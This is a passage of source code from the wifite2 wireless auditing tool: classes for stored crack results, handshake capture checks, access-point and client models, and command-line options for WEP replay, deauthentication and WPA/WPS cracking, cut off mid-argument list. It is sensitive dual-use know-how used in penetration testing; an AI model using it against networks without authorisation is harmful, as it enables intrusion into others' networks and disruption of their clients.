@classmethod def load_all(cls): if not os.path.exists(cls.cracked_file): return [] with open(cls.cracked_file, 'r') as json_file: try: json = loads(json_file.read()) except ValueError: return [] return json @staticmethod def load(json): """ Returns an instance of the appropriate object given a json instance """ global result if json['type'] == 'WPA': from .wpa_result import CrackResultWPA result = CrackResultWPA(json['bssid'], json['essid'], json['handshake_file'], json['key']) elif json['type'] == 'WEP': from .wep_result import CrackResultWEP result = CrackResultWEP(json['bssid'], json['essid'], json['hex_key'], json['ascii_key']) elif json['type'] == 'WPS': from .wps_result import CrackResultWPS result = CrackResultWPS(json['bssid'], json['essid'], json['pin'], json['psk']) elif json['type'] == 'PMKID': from .pmkid_result import CrackResultPMKID result = CrackResultPMKID(json['bssid'], json['essid'], json['pmkid_file'], json['key']) result.date = json['date'] result.readable_date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(result.date)) return result if __name__ == '__main__': # Deserialize WPA object Color.pl('\nCracked WPA:') json = loads( '{"bssid": "AA:BB:CC:DD:EE:FF", "essid": "Test Router", "key": "Key", "date": 1433402428, ' '"handshake_file": "hs/capfile.cap", "type": "WPA"}') obj = CrackResult.load(json) obj.dump() # Deserialize WEP object Color.pl('\nCracked WEP:') json = loads( '{"bssid": "AA:BB:CC:DD:EE:FF", "hex_key": "00:01:02:03:04", "ascii_key": "abcde", ' '"essid": "Test Router", "date": 1433402915, "type": "WEP"}') obj = CrackResult.load(json) obj.dump() # Deserialize WPS object Color.pl('\nCracked WPS:') json = loads( '{"psk": "the psk", "bssid": "AA:BB:CC:DD:EE:FF", "pin": "01234567", "essid": "Test Router", ' '"date": 1433403278, "type": "WPS"}') obj = CrackResult.load(json) obj.dump() wifite2-2.7.0/wifite/model/attack.py0000755000175000017500000000220514437644461016660 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import time from ..config import Configuration class Attack(object): """Contains functionality common to all attacks.""" target_wait = min(60, Configuration.wpa_attack_timeout) def __init__(self, target): self.target = target def run(self): raise Exception('Unimplemented method: run') def wait_for_target(self, airodump): """Waits for target to appear in airodump.""" start_time = time.time() targets = airodump.get_targets(apply_filter=False) while len(targets) == 0: # Wait for target to appear in airodump. if int(time.time() - start_time) > Attack.target_wait: raise Exception(f'Target did not appear after {Attack.target_wait:d} seconds, stopping') time.sleep(1) targets = airodump.get_targets() continue airodump_target = next((t for t in targets if t.bssid == self.target.bssid), None) if airodump_target is None: raise Exception(f'Could not find target ({self.target.bssid}) in airodump') return airodump_target wifite2-2.7.0/wifite/model/handshake.py0000755000175000017500000002056114437644461017344 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from ..util.process import Process from ..util.color import Color from ..tools.tshark import Tshark import re import os class Handshake(object): def __init__(self, capfile, bssid=None, essid=None): self.capfile = capfile self.bssid = bssid self.essid = essid def divine_bssid_and_essid(self): """ Tries to find BSSID and ESSID from cap file. Sets this instances 'bssid' and 'essid' instance fields. """ # We can get BSSID from the .cap filename if Wifite captured it. # ESSID is stripped of non-printable characters, so we can't rely on that. if self.bssid is None: hs_regex = re.compile(r'^.*handshake_\w+_([\dA-F\-]{17})_.*\.cap$', re.IGNORECASE) result = hs_regex.match(self.capfile) if result is not None: self.bssid = result[1].replace('-', ':') # Get list of bssid/essid pairs from cap file pairs = Tshark.bssid_essid_pairs(self.capfile, bssid=self.bssid) if len(pairs) == 0 and (not self.bssid and not self.essid): # Tshark failed us, nothing else we can do. raise ValueError(f'Cannot find BSSID or ESSID in cap file {self.capfile}') if not self.essid and not self.bssid: # We do not know the bssid nor the essid # TODO: Display menu for user to select from list # HACK: Just use the first one we see self.bssid = pairs[0][0] self.essid = pairs[0][1] Color.pl('{!} {O}Warning{W}: {O}Arbitrarily selected ' + '{R}bssid{O} {C}%s{O} and {R}essid{O} "{C}%s{O}"{W}' % (self.bssid, self.essid)) if not self.bssid: # We already know essid for (bssid, essid) in pairs: if self.essid == essid: Color.pl('\n{+} Discovered bssid {C}%s{W}' % bssid) self.bssid = bssid break if not self.essid and len(pairs) > 0: for (bssid, essid) in pairs: if self.bssid.lower() == bssid.lower(): Color.pl('\n{+} Discovered essid "{C}%s{W}"' % essid) self.essid = essid break def has_handshake(self): if not self.bssid or not self.essid: self.divine_bssid_and_essid() return len(self.tshark_handshakes()) > 0 def tshark_handshakes(self): """Returns list[tuple] of BSSID & ESSID pairs (ESSIDs are always `None`).""" tshark_bssids = Tshark.bssids_with_handshakes(self.capfile, bssid=self.bssid) return [(bssid, None) for bssid in tshark_bssids] def cowpatty_handshakes(self): """Returns list[tuple] of BSSID & ESSID pairs (BSSIDs are always `None`).""" if not Process.exists('cowpatty'): return [] # Needs to check if cowpatty is updated and have the -2 parameter cowpattycheck = Process('cowpatty', devnull=False) command = [ 'cowpatty', '-2' if 'frames 1 and 2 or 2 and 3 for key attack' in cowpattycheck.stdout() else '', '-r', self.capfile, '-c' # Check for handshake ] proc = Process(command, devnull=False) return next( ( [(None, self.essid)] for line in proc.stdout().split('\n') if 'Collected all necessary data to ' 'mount crack against WPA' in line ), [], ) def aircrack_handshakes(self): """Returns tuple (BSSID,None) if aircrack thinks self.capfile contains a handshake / can be cracked""" if not self.bssid: return [] # Aircrack requires BSSID command = [ 'aircrack-ng', '-b', self.bssid, self.capfile ] proc = Process(command, devnull=False) if 'potential target' in proc.stdout().lower() and 'no matching network' not in proc.stdout().lower(): return [(self.bssid, None)] else: return [] def analyze(self): """Prints analysis of handshake capfile""" self.divine_bssid_and_essid() if Tshark.exists(): Handshake.print_pairs(self.tshark_handshakes(), 'tshark') if Process.exists('cowpatty'): Handshake.print_pairs(self.cowpatty_handshakes(), 'cowpatty') Handshake.print_pairs(self.aircrack_handshakes(), 'aircrack') def strip(self, outfile=None): # XXX: This method might break aircrack-ng, use at own risk. """ Strips out packets from handshake that aren't necessary to crack. Leaves only handshake packets and SSID broadcast (for discovery). Args: outfile - Filename to save stripped handshake to. If outfile==None, overwrite existing self.capfile. """ if not outfile: outfile = f'{self.capfile}.temp' replace_existing_file = True else: replace_existing_file = False cmd = [ 'tshark', '-r', self.capfile, # input file '-Y', 'wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol', # filter '-w', outfile # output file ] proc = Process(cmd) proc.wait() if replace_existing_file: from shutil import copy copy(outfile, self.capfile) os.remove(outfile) @staticmethod def print_pairs(pairs, tool=None): """ Prints out BSSID and/or ESSID given a list of tuples (bssid,essid) """ tool_str = '{C}%s{W}: ' % tool.rjust(8) if tool is not None else '' if len(pairs) == 0: Color.pl('{!} %s.cap file {R}does not{O} contain a valid handshake{W}' % tool_str) return for (bssid, essid) in pairs: out_str = '{+} %s.cap file {G}contains a valid handshake{W} for' % tool_str if bssid and essid: Color.pl('%s ({G}%s{W}) [{G}%s{W}]' % (out_str, bssid, essid)) elif bssid: Color.pl('%s ({G}%s{W})' % (out_str, bssid)) elif essid: Color.pl('%s [{G}%s{W}]' % (out_str, essid)) @staticmethod def check(): """ Analyzes .cap file(s) for handshake """ from ..config import Configuration if Configuration.check_handshake == '': Color.pl('{+} checking all handshakes in {G}"./hs"{W} directory\n') try: capfiles = [os.path.join('hs', x) for x in os.listdir('hs') if x.endswith('.cap')] except OSError: capfiles = [] if not capfiles: Color.pl('{!} {R}no .cap files found in {O}"./hs"{W}\n') else: capfiles = [Configuration.check_handshake] for capfile in capfiles: Color.pl('{+} checking for handshake in .cap file {C}%s{W}' % capfile) if not os.path.exists(capfile): Color.pl('{!} {O}.cap file {C}%s{O} not found{W}' % capfile) return hs = Handshake(capfile, bssid=Configuration.target_bssid, essid=Configuration.target_essid) hs.analyze() Color.pl('') if __name__ == '__main__': print("\n-------------------------------") print('With BSSID & ESSID specified:') hs = Handshake('./tests/files/handshake_has_1234.cap', bssid='18:d6:c7:6d:6b:18', essid='YZWifi') hs.analyze() print(('has_hanshake() =', hs.has_handshake())) print("\n-------------------------------") print('\nWith BSSID, but no ESSID specified:') hs = Handshake('./tests/files/handshake_has_1234.cap', bssid='18:d6:c7:6d:6b:18') hs.analyze() print(('has_hanshake() =', hs.has_handshake())) print("\n-------------------------------") print('\nWith ESSID, but no BSSID specified:') hs = Handshake('./tests/files/handshake_has_1234.cap', essid='YZWifi') hs.analyze() print(('has_hanshake() =', hs.has_handshake())) print("\n-------------------------------") print('\nWith neither BSSID nor ESSID specified:') hs = Handshake('./tests/files/handshake_has_1234.cap') try: hs.analyze() print(('has_hanshake() =', hs.has_handshake())) except Exception as e: Color.pl('{O}Error during Handshake.analyze(): {R}%s{W}' % e) wifite2-2.7.0/wifite/model/__init__.py0000755000175000017500000000000014437644461017137 0ustar sophiesophiewifite2-2.7.0/wifite/model/wps_result.py0000755000175000017500000000376614437644461017635 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from ..util.color import Color from ..model.result import CrackResult from contextlib import contextmanager, redirect_stderr, redirect_stdout from os import devnull @contextmanager def suppress_stdout_stderr(): """A context manager that redirects stdout and stderr to devnull""" with open(devnull, 'w') as fnull: with redirect_stderr(fnull) as err, redirect_stdout(fnull) as out: yield err, out class CrackResultWPS(CrackResult): def __init__(self, bssid, essid, pin, psk): self.result_type = 'WPS' self.bssid = bssid self.essid = essid self.pin = pin self.psk = psk super(CrackResultWPS, self).__init__() def dump(self): if self.essid is not None: Color.pl(f'{{+}} {"ESSID".rjust(12)}: {{C}}{self.essid}{{W}}') psk = '{O}N/A{W}' if self.psk is None else '{G}%s{W}' % self.psk Color.pl('{+} %s: {C}%s{W}' % ('BSSID'.rjust(12), self.bssid)) Color.pl('{+} %s: {C}WPA{W} ({C}WPS{W})' % 'Encryption'.rjust(12)) Color.pl('{+} %s: {G}%s{W}' % ('WPS PIN'.rjust(12), self.pin)) Color.pl('{+} %s: {G}%s{W}' % ('PSK/Password'.rjust(12), psk)) def print_single_line(self, longest_essid): self.print_single_line_prefix(longest_essid) Color.p('{G}%s{W}' % 'WPS'.ljust(5)) Color.p(' ') if self.psk: Color.p('Key: {G}%s{W} ' % self.psk) Color.p('PIN: {G}%s{W}' % self.pin) Color.pl('') def to_dict(self): with suppress_stdout_stderr(): print('@@@ to dict', self.__dict__) return { 'type': self.result_type, 'date': self.date, 'essid': self.essid, 'bssid': self.bssid, 'pin': self.pin, 'psk': self.psk } if __name__ == '__main__': crw = CrackResultWPS('AA:BB:CC:DD:EE:FF', 'Test Router', '01234567', 'the psk') crw.dump() crw.save() wifite2-2.7.0/wifite/model/wep_result.py0000755000175000017500000000300114437644461017575 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from ..util.color import Color from .result import CrackResult class CrackResultWEP(CrackResult): def __init__(self, bssid, essid, hex_key, ascii_key): self.result_type = 'WEP' self.bssid = bssid self.essid = essid self.hex_key = hex_key self.ascii_key = ascii_key super(CrackResultWEP, self).__init__() def dump(self): if self.essid: Color.pl('{+} ESSID: {C}%s{W}' % self.essid) Color.pl('{+} BSSID: {C}%s{W}' % self.bssid) Color.pl('{+} Encryption: {C}%s{W}' % self.result_type) Color.pl('{+} Hex Key: {G}%s{W}' % self.hex_key) if self.ascii_key: Color.pl('{+} Ascii Key: {G}%s{W}' % self.ascii_key) def print_single_line(self, longest_essid): self.print_single_line_prefix(longest_essid) Color.p('{G}%s{W}' % 'WEP'.ljust(5)) Color.p(' ') Color.p('Hex: {G}%s{W}' % self.hex_key.replace(':', '')) if self.ascii_key: Color.p(' (ASCII: {G}%s{W})' % self.ascii_key) Color.pl('') def to_dict(self): return { 'type': self.result_type, 'date': self.date, 'essid': self.essid, 'bssid': self.bssid, 'hex_key': self.hex_key, 'ascii_key': self.ascii_key } if __name__ == '__main__': crw = CrackResultWEP('AA:BB:CC:DD:EE:FF', 'Test Router', '00:01:02:03:04', 'abcde') crw.dump() crw.save() wifite2-2.7.0/wifite/model/client.py0000755000175000017500000000251314437644461016671 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- class Client(object): """ Holds details for a 'Client' - a wireless device (e.g. computer) that is associated with an Access Point (e.g. router) """ def __init__(self, fields): """ Initializes & stores client info based on fields. Args: Fields - List of strings INDEX KEY 0 Station MAC (client's MAC address) 1 First time seen, 2 Last time seen, 3 Power, 4 # packets, 5 BSSID, (Access Point's MAC address) 6 Probed ESSIDs """ self.station = fields[0].strip() self.power = int(fields[3].strip()) self.packets = int(fields[4].strip()) self.bssid = fields[5].strip() def __str__(self): """ String representation of a Client """ result = '' for (key, value) in list(self.__dict__.items()): result += f'{key}: {str(value)}' result += ', ' return result if __name__ == '__main__': fields = 'AA:BB:CC:DD:EE:FF, 2015-05-27 19:43:47, 2015-05-27 19:43:47, -67, 2,' \ ' (not associated) ,HOME-ABCD'.split(',') c = Client(fields) print(('Client', c)) wifite2-2.7.0/wifite/model/wpa_result.py0000755000175000017500000000344514437644461017605 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from ..util.color import Color from .result import CrackResult class CrackResultWPA(CrackResult): def __init__(self, bssid, essid, handshake_file, key): self.result_type = 'WPA' self.bssid = bssid self.essid = essid self.handshake_file = handshake_file self.key = key super(CrackResultWPA, self).__init__() def dump(self): if self.essid: Color.pl(f'{{+}} {"Access Point Name".rjust(19)}: {{C}}{self.essid}{{W}}') if self.bssid: Color.pl(f'{{+}} {"Access Point BSSID".rjust(19)}: {{C}}{self.bssid}{{W}}') Color.pl('{+} %s: {C}%s{W}' % ('Encryption'.rjust(19), self.result_type)) if self.handshake_file: Color.pl('{+} %s: {C}%s{W}' % ('Handshake File'.rjust(19), self.handshake_file)) if self.key: Color.pl('{+} %s: {G}%s{W}' % ('PSK (password)'.rjust(19), self.key)) else: Color.pl('{!} %s {O}key unknown{W}' % ''.rjust(19)) def print_single_line(self, longest_essid): self.print_single_line_prefix(longest_essid) Color.p('{G}%s{W}' % 'WPA'.ljust(5)) Color.p(' ') Color.p('Key: {G}%s{W}' % self.key) Color.pl('') def to_dict(self): return { 'type': self.result_type, 'date': self.date, 'essid': self.essid, 'bssid': self.bssid, 'key': self.key, 'handshake_file': self.handshake_file } if __name__ == '__main__': w = CrackResultWPA('AA:BB:CC:DD:EE:FF', 'Test Router', 'hs/capfile.cap', 'abcd1234') w.dump() w = CrackResultWPA('AA:BB:CC:DD:EE:FF', 'Test Router', 'hs/capfile.cap', 'Key') print('\n') w.dump() w.save() print((w.__dict__['bssid'])) wifite2-2.7.0/wifite/model/target.py0000755000175000017500000002134514437644461016705 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from ..util.color import Color from ..config import Configuration import re class WPSState: NONE, UNLOCKED, LOCKED, UNKNOWN = list(range(4)) class ArchivedTarget(object): """ Holds information between scans from a previously found target """ def __init__(self, target): self.bssid = target.bssid self.channel = target.channel self.decloaked = target.decloaked self.attacked = target.attacked self.essid = target.essid self.essid_known = target.essid_known self.essid_len = target.essid_len def transfer_info(self, other): """ Helper function to transfer relevant fields into another Target or ArchivedTarget """ other.attacked = self.attacked if self.essid_known and other.essid_known: other.decloaked = self.decloaked if not other.essid_known: other.decloaked = self.decloaked other.essid = self.essid other.essid_known = self.essid_known other.essid_len = self.essid_len def __eq__(self, other): # Check if the other class type is either ArchivedTarget or Target return isinstance(other, (self.__class__, Target)) and self.bssid == other.bssid class Target(object): """ Holds details for a 'Target' aka Access Point (e.g. router). """ def __init__(self, fields): """ Initializes & stores target info based on fields. Args: Fields - List of strings INDEX KEY EXAMPLE 0 BSSID (00:1D:D5:9B:11:00) 1 First time seen (2015-05-27 19:28:43) 2 Last time seen (2015-05-27 19:28:46) 3 channel (6) 4 Speed (54) 5 Privacy (WPA2) 6 Cipher (CCMP TKIP) 7 Authentication (PSK) 8 Power (-62) 9 beacons (2) 10 # IV (0) 11 LAN IP (0. 0. 0. 0) 12 ID-length (9) 13 ESSID (HOME-ABCD) 14 Key () """ self.manufacturer = None self.wps = WPSState.NONE self.bssid = fields[0].strip() self.channel = fields[3].strip() self.encryption = fields[5].strip() self.authentication = fields[7].strip() # airodump sometimes does not report the encryption type for some reason # In this case (len = 0), defaults to WPA (which is the most common) if 'WPA' in self.encryption or len(self.encryption) == 0: self.encryption = 'WPA' elif 'WEP' in self.encryption: self.encryption = 'WEP' elif 'WPS' in self.encryption: self.encryption = 'WPS' if len(self.encryption) > 4: self.encryption = self.encryption[:4].strip() self.power = int(fields[8].strip()) if self.power < 0: self.power += 100 self.max_power = self.power self.beacons = int(fields[9].strip()) self.ivs = int(fields[10].strip()) self.essid_known = True self.essid_len = int(fields[12].strip()) self.essid = fields[13] if self.essid == '\\x00' * self.essid_len or \ self.essid == 'x00' * self.essid_len or \ self.essid.strip() == '': # Don't display '\x00...' for hidden ESSIDs self.essid = None # '(%s)' % self.bssid self.essid_known = False # self.wps = WPSState.UNKNOWN # Will be set to true once this target will be attacked # Needed to count targets in infinite attack mode self.attacked = False self.decloaked = False # If ESSID was hidden but we decloaked it. self.clients = [] self.validate() def __eq__(self, other): # Check if the other class type is either ArchivedTarget or Target return isinstance(other, (self.__class__, ArchivedTarget)) and self.bssid == other.bssid def transfer_info(self, other): """ Helper function to transfer relevant fields into another Target or ArchivedTarget """ other.wps = self.wps other.attacked = self.attacked if self.essid_known: if other.essid_known: other.decloaked = self.decloaked if not other.essid_known: other.decloaked = self.decloaked other.essid = self.essid other.essid_known = self.essid_known other.essid_len = self.essid_len def validate(self): """ Checks that the target is valid. """ if self.channel == '-1': raise Exception('Ignoring target with Negative-One (-1) channel') # Filter broadcast/multicast BSSIDs, see https://github.com/derv82/wifite2/issues/32 bssid_broadcast = re.compile(r'^(ff:ff:ff:ff:ff:ff|00:00:00:00:00:00)$', re.IGNORECASE) if bssid_broadcast.match(self.bssid): raise Exception(f'Ignoring target with Broadcast BSSID ({self.bssid})') bssid_multicast = re.compile(r'^(01:00:5e|01:80:c2|33:33)', re.IGNORECASE) if bssid_multicast.match(self.bssid): raise Exception(f'Ignoring target with Multicast BSSID ({self.bssid})') def to_str(self, show_bssid=False, show_manufacturer=False): # sourcery no-metrics """ *Colored* string representation of this Target. Specifically formatted for the 'scanning' table view. """ max_essid_len = 24 essid = self.essid if self.essid_known else f'({self.bssid})' # Trim ESSID (router name) if needed if len(essid) > max_essid_len: essid = f'{essid[:max_essid_len - 3]}...' else: essid = essid.rjust(max_essid_len) if self.essid_known: # Known ESSID essid = Color.s('{C}%s' % essid) else: # Unknown ESSID essid = Color.s('{O}%s' % essid) # if self.power < self.max_power: # var = self.max_power # Add a '*' if we decloaked the ESSID decloaked_char = '*' if self.decloaked else ' ' essid += Color.s('{P}%s' % decloaked_char) bssid = Color.s('{O}%s ' % self.bssid) if show_bssid else '' if show_manufacturer: oui = ''.join(self.bssid.split(':')[:3]) self.manufacturer = Configuration.manufacturers.get(oui, "") max_oui_len = 27 manufacturer = Color.s('{W}%s ' % self.manufacturer) # Trim manufacturer name if needed if len(manufacturer) > max_oui_len: manufacturer = f'{manufacturer[:max_oui_len - 3]}...' else: manufacturer = manufacturer.rjust(max_oui_len) else: manufacturer = '' channel_color = '{C}' if int(self.channel) > 14 else '{G}' channel = Color.s(f'{channel_color}{str(self.channel).rjust(3)}') encryption = self.encryption.rjust(3) if 'WEP' in encryption: encryption = Color.s('{G}%s' % encryption) elif 'WPA' in encryption: if 'PSK' in self.authentication: encryption = Color.s('{O}%s-P' % encryption) elif 'MGT' in self.authentication: encryption = Color.s('{R}%s-E' % encryption) else: encryption = Color.s('{O}%s ' % encryption) power = f'{str(self.power).rjust(3)}db' if self.power > 50: color = 'G' elif self.power > 35: color = 'O' else: color = 'R' power = Color.s('{%s}%s' % (color, power)) if self.wps == WPSState.UNLOCKED: wps = Color.s('{G} yes') elif self.wps == WPSState.NONE: wps = Color.s('{O} no') elif self.wps == WPSState.LOCKED: wps = Color.s('{R}lock') elif self.wps == WPSState.UNKNOWN: wps = Color.s('{O} n/a') else: wps = ' ERR' clients = ' ' if len(self.clients) > 0: clients = Color.s('{G} ' + str(len(self.clients))) result = f'{essid} {bssid}{manufacturer}{channel} {encryption} {power} {wps} {clients}' result += Color.s('{W}') return result if __name__ == '__main__': fields = 'AA:BB:CC:DD:EE:FF,2015-05-27 19:28:44,2015-05-27 19:28:46,1,54,WPA2,CCMP ' \ 'TKIP,PSK,-58,2,0,0.0.0.0,9,HOME-ABCD,'.split(',') t = Target(fields) t.clients.append('asdf') t.clients.append('asdf') print((t.to_str())) wifite2-2.7.0/wifite/args.py0000755000175000017500000006107114437644461015253 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .util.color import Color import argparse import sys class Arguments(object): """ Holds arguments used by the Wifite """ def __init__(self, configuration): # Hack: Check for -v before parsing args; # so we know which commands to display. self.verbose = '-v' in sys.argv or '-hv' in sys.argv or '-vh' in sys.argv self.config = configuration self.args = self.get_arguments() def _verbose(self, msg): return Color.s(msg) if self.verbose else argparse.SUPPRESS def get_arguments(self): """ Returns parser.args() containing all program arguments """ parser = argparse.ArgumentParser(usage=argparse.SUPPRESS, formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=80, width=130)) self._add_global_args(parser.add_argument_group(Color.s('{C}SETTINGS{W}'))) self._add_wep_args(parser.add_argument_group(Color.s('{C}WEP{W}'))) self._add_wpa_args(parser.add_argument_group(Color.s('{C}WPA{W}'))) self._add_wps_args(parser.add_argument_group(Color.s('{C}WPS{W}'))) self._add_pmkid_args(parser.add_argument_group(Color.s('{C}PMKID{W}'))) self._add_eviltwin_args(parser.add_argument_group(Color.s('{C}EVIL TWIN{W}'))) self._add_command_args(parser.add_argument_group(Color.s('{C}COMMANDS{W}'))) return parser.parse_args() def _add_global_args(self, glob): glob.add_argument('-v', '--verbose', action='count', default=0, dest='verbose', help=Color.s( 'Shows more options ({C}-h -v{W}). Prints commands and outputs. (default: {G}quiet{W})')) glob.add_argument('-i', action='store', dest='interface', metavar='[interface]', type=str, help=Color.s('Wireless interface to use, e.g. {C}wlan0mon{W} (default: {G}ask{W})')) glob.add_argument('-c', action='store', dest='channel', metavar='[channel]', help=Color.s('Wireless channel to scan e.g. {C}1,3-6{W} (default: {G}all 2Ghz channels{W})')) glob.add_argument('--channel', help=argparse.SUPPRESS, action='store', dest='channel') glob.add_argument('-ab', '--allbands', action='store_true', dest='all_bands', help=self._verbose('Include both 2.4Ghz and 5Ghz bands (default: {G}off{W})')) glob.add_argument('-2', '--2ghz', action='store_true', dest='two_ghz', help=self._verbose('Include 2.4Ghz channels (default: {G}off{W})')) glob.add_argument('-5', '--5ghz', action='store_true', dest='five_ghz', help=self._verbose('Include 5Ghz channels (default: {G}off{W})')) glob.add_argument('-inf', '--infinite', action='store_true', dest='infinite_mode', help=Color.s( 'Enable infinite attack mode. Modify scanning time with {C}-p{W} (default: {G}off{W})')) glob.add_argument('-mac', '--random-mac', action='store_true', dest='random_mac', help=Color.s('Randomize wireless card MAC address (default: {G}off{W})')) glob.add_argument('-p', action='store', dest='scan_time', nargs='?', const=10, metavar='scan_time', type=int, help=Color.s('{G}Pillage{W}: Attack all targets after {C}scan_time{W} (seconds)')) glob.add_argument('--pillage', help=argparse.SUPPRESS, action='store', dest='scan_time', nargs='?', const=10, type=int) glob.add_argument('--kill', action='store_true', dest='kill_conflicting_processes', help=Color.s('Kill processes that conflict with Airmon/Airodump (default: {G}off{W})')) glob.add_argument('-pow', '--power', action='store', dest='min_power', metavar='[min_power]', type=int, help=Color.s('Attacks any targets with at least {C}min_power{W} signal strength')) glob.add_argument('--skip-crack', action='store_true', dest='skip_crack', help=Color.s('Skip cracking captured handshakes/pmkid (default: {G}off{W})')) glob.add_argument('-first', '--first', action='store', dest='attack_max', metavar='[attack_max]', type=int, help=Color.s('Attacks the first {C}attack_max{W} targets')) glob.add_argument('-b', action='store', dest='target_bssid', metavar='[bssid]', type=str, help=self._verbose('BSSID (e.g. {GR}AA:BB:CC:DD:EE:FF{W}) of access point to attack')) glob.add_argument('--bssid', help=argparse.SUPPRESS, action='store', dest='target_bssid', type=str) glob.add_argument('-e', action='store', dest='target_essid', metavar='[essid]', type=str, help=self._verbose('ESSID (e.g. {GR}NETGEAR07{W}) of access point to attack')) glob.add_argument('--essid', help=argparse.SUPPRESS, action='store', dest='target_essid', type=str) glob.add_argument('-E', action='append', dest='ignore_essids', metavar='[text]', type=str, default=None, help=self._verbose( 'Hides targets with ESSIDs that match the given text. Can be used more than once.')) glob.add_argument('--ignore-essid', help=argparse.SUPPRESS, action='append', dest='ignore_essids', type=str) glob.add_argument('-ic', '--ignore-cracked', action='store_true', dest='ignore_cracked', help=Color.s('Hides previously-cracked targets. (default: {G}off{W})')) glob.add_argument('--clients-only', action='store_true', dest='clients_only', help=Color.s('Only show targets that have associated clients (default: {G}off{W})')) glob.add_argument('--showb', action='store_true', dest='show_bssids', help=self._verbose('Show BSSIDs of targets while scanning')) glob.add_argument('--showm', action='store_true', dest='show_manufacturers', help=self._verbose('Show manufacturers of targets while scanning')) glob.add_argument('--nodeauths', action='store_true', dest='no_deauth', help=Color.s('Passive mode: Never deauthenticates clients (default: {G}deauth targets{W})')) glob.add_argument('--no-deauths', action='store_true', dest='no_deauth', help=argparse.SUPPRESS) glob.add_argument('-nd', action='store_true', dest='no_deauth', help=argparse.SUPPRESS) glob.add_argument('--num-deauths', action='store', type=int, dest='num_deauths', metavar='[num]', default=None, help=self._verbose( 'Number of deauth packets to send (default: {G}%d{W})' % self.config.num_deauths)) glob.add_argument('--daemon', action='store_true', dest='daemon', help=Color.s('Puts device back in managed mode after quitting (default: {G}off{W})')) def _add_eviltwin_args(self, group): """ group.add_argument('--eviltwin', action='store_true', dest='use_eviltwin', help=Color.s('Use the "Evil Twin" attack against all targets ' + '(default: {G}off{W})')) # TODO: Args to specify deauth interface, server port, etc. """ def _add_wep_args(self, wep): # WEP wep.add_argument('--wep', action='store_true', dest='wep_filter', help=Color.s('Show only {C}WEP-encrypted networks{W}')) wep.add_argument('-wep', help=argparse.SUPPRESS, action='store_true', dest='wep_filter') wep.add_argument('--require-fakeauth', action='store_true', dest='require_fakeauth', help=Color.s('Fails attacks if {C}fake-auth{W} fails (default: {G}off{W})')) wep.add_argument('--nofakeauth', help=argparse.SUPPRESS, action='store_true', dest='require_fakeauth') wep.add_argument('-nofakeauth', help=argparse.SUPPRESS, action='store_true', dest='require_fakeauth') wep.add_argument('--keep-ivs', action='store_true', dest='wep_keep_ivs', default=False, help=Color.s('Retain .IVS files and reuse when cracking (default: {G}off{W})')) wep.add_argument('--pps', action='store', dest='wep_pps', metavar='[pps]', type=int, help=self._verbose( 'Packets-per-second to replay (default: {G}%d pps{W})' % self.config.wep_pps)) wep.add_argument('-pps', help=argparse.SUPPRESS, action='store', dest='wep_pps', type=int) wep.add_argument('--wept', action='store', dest='wep_timeout', metavar='[seconds]', type=int, help=self._verbose( 'Seconds to wait before failing (default: {G}%d sec{W})' % self.config.wep_timeout)) wep.add_argument('-wept', help=argparse.SUPPRESS, action='store', dest='wep_timeout', type=int) wep.add_argument('--wepca', action='store', dest='wep_crack_at_ivs', metavar='[ivs]', type=int, help=self._verbose('Start cracking at this many IVs (default: {G}%d ivs{W})' % self.config.wep_crack_at_ivs)) wep.add_argument('-wepca', help=argparse.SUPPRESS, action='store', dest='wep_crack_at_ivs', type=int) wep.add_argument('--weprs', action='store', dest='wep_restart_stale_ivs', metavar='[seconds]', type=int, help=self._verbose('Restart aireplay if no new IVs appear (default: {G}%d sec{W})' % self.config.wep_restart_stale_ivs)) wep.add_argument('-weprs', help=argparse.SUPPRESS, action='store', dest='wep_restart_stale_ivs', type=int) wep.add_argument('--weprc', action='store', dest='wep_restart_aircrack', metavar='[seconds]', type=int, help=self._verbose('Restart aircrack after this delay (default: {G}%d sec{W})' % self.config.wep_restart_aircrack)) wep.add_argument('-weprc', help=argparse.SUPPRESS, action='store', dest='wep_restart_aircrack', type=int) wep.add_argument('--arpreplay', action='store_true', dest='wep_attack_replay', help=self._verbose('Use {C}ARP-replay{W} WEP attack (default: {G}on{W})')) wep.add_argument('-arpreplay', help=argparse.SUPPRESS, action='store_true', dest='wep_attack_replay') wep.add_argument('--fragment', action='store_true', dest='wep_attack_fragment', help=self._verbose('Use {C}fragmentation{W} WEP attack (default: {G}on{W})')) wep.add_argument('-fragment', help=argparse.SUPPRESS, action='store_true', dest='wep_attack_fragment') wep.add_argument('--chopchop', action='store_true', dest='wep_attack_chopchop', help=self._verbose('Use {C}chop-chop{W} WEP attack (default: {G}on{W})')) wep.add_argument('-chopchop', help=argparse.SUPPRESS, action='store_true', dest='wep_attack_chopchop') wep.add_argument('--caffelatte', action='store_true', dest='wep_attack_caffe', help=self._verbose('Use {C}caffe-latte{W} WEP attack (default: {G}on{W})')) wep.add_argument('-caffelatte', help=argparse.SUPPRESS, action='store_true', dest='wep_attack_caffelatte') wep.add_argument('--p0841', action='store_true', dest='wep_attack_p0841', help=self._verbose('Use {C}p0841{W} WEP attack (default: {G}on{W})')) wep.add_argument('-p0841', help=argparse.SUPPRESS, action='store_true', dest='wep_attack_p0841') wep.add_argument('--hirte', action='store_true', dest='wep_attack_hirte', help=self._verbose('Use {C}hirte{W} WEP attack (default: {G}on{W})')) wep.add_argument('-hirte', help=argparse.SUPPRESS, action='store_true', dest='wep_attack_hirte') def _add_wpa_args(self, wpa): wpa.add_argument('--wpa', action='store_true', dest='wpa_filter', help=Color.s('Show only {C}WPA-encrypted networks{W} (includes {C}WPS{W})')) wpa.add_argument('-wpa', help=argparse.SUPPRESS, action='store_true', dest='wpa_filter') wpa.add_argument('--hs-dir', action='store', dest='wpa_handshake_dir', metavar='[dir]', type=str, help=self._verbose( 'Directory to store handshake files (default: {G}%s{W})' % self.config.wpa_handshake_dir)) wpa.add_argument('-hs-dir', 